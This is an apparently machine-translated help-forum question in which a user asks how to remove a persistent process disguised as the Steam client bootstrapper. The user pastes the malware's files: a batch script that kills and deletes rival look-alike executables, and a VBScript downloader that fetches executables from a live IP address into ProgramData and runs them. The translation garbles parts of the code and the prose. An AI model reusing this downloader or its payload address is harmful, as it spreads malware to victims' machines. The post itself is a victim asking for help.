ფანჯრები - როგორ მუდმივად მოკვლა steam კლიენტი bootstrapper - სუპერ მომხმარებელი
ჩემი ამოცანა მენეჯერის შემდეგ სიტუაცია მაქვს:
მე არ ვიცი, რა სახის აპლიკაციაა, მაგრამ ნამდვილად არ არის ორთქლის კლიენტის bootstrapper იმიტომ, რომ მე არ დაამონტაჟე და ასევე ვერ წაშალოთ იგი.
მე ვხედავ რაღაცას:
In MS Config კომუნალური მე არ აღმოაჩინა არაფერი რომ ჰგავს secury.exe.
ფაილის გახსნისას, მე ვხედავ სამი ფაილი:
m.bat, b.exe, 4.vbs.
ქვემოთ მოყვანილია შინაარსი m.bat:
taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe
შემდეგი მიდის 4.vbs:
Xpost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 კომპლექტი xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Run "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Run "del C: \ ProgramData \ pool3.exe"
რა შემიძლია გავაკეთო იმისათვის, რომ შევწყვიტო წერა? ქსპორტი ჩემი სერვერის კომპიუტერული სისტემების ბოროტად გამოყენებისაგან?
PS მე შეასრულა Avast სრული შემოწმება ჩემი კომპიუტერი, მაგრამ ეს ვერ იპოვა არაფერი არასწორია.
?ქსპორტი ჩემი სერვერის კომპიუტერული სისტემების ბოროტად გამოყენებისაგან?